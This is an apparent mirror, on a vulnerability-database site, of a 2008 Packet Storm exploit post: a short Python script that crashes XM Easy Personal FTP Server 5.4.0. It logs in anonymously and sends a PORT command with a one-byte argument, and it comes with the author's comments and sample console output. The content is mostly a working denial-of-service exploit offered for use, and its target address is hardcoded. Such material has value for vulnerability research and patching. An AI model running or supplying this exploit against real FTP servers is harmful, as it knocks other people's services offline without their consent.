Lucene search
K

xmeasy-port-dos.txt

🗓️ 14 Apr 2008 00:00:00Reported by j0rganType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

DoS attack on XM Easy FTP Server 5.4.0 using a 1 byte payload exploit.

Code
`#!/usr/bin/python  
########################################  
# XM Easy Personal FTP Server 5.4.0 (PORT) DoS  
# 1 byte DoS!  
#  
# Elhamdulillahi Rabbil-alemin!  
#  
########################################  
# EAX BAADF00D <- bad food? :)  
# ECX BAADF00D  
########################################  
#  
# bt ~ # ./sploit.py  
#  
# [+] Saljemo zli bafer :)  
# [+] Booooooooom!!!!  
# [+] Finito!  
# bt ~ #  
########################################  
# I wasn't smoking crack, ryujin gave me the red pill! :)  
#  
# Vulnerability discovered and coded by Muris Kurgas a.k.a j0rgan  
# jorganwd [at] gmail [dot] com  
# http://www.jorgan.users.cg.yu  
########################################  
  
import struct  
import socket  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
bafer = 'A'* 1  
print "\n [+] Saljemo zli bafer :)"  
s.connect(('192.168.190.132',21))  
data = s.recv(1024)  
s.send('USER ftp' +'\r\n')  
data = s.recv(1024)  
s.send('PASS lozinka' + '\r\n')  
data = s.recv(1024)  
print " [+] Booooooooom!!!!"  
s.send('PORT ' +bafer+ '\r\n')  
s.close()  
print " [+] Finito! "  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
43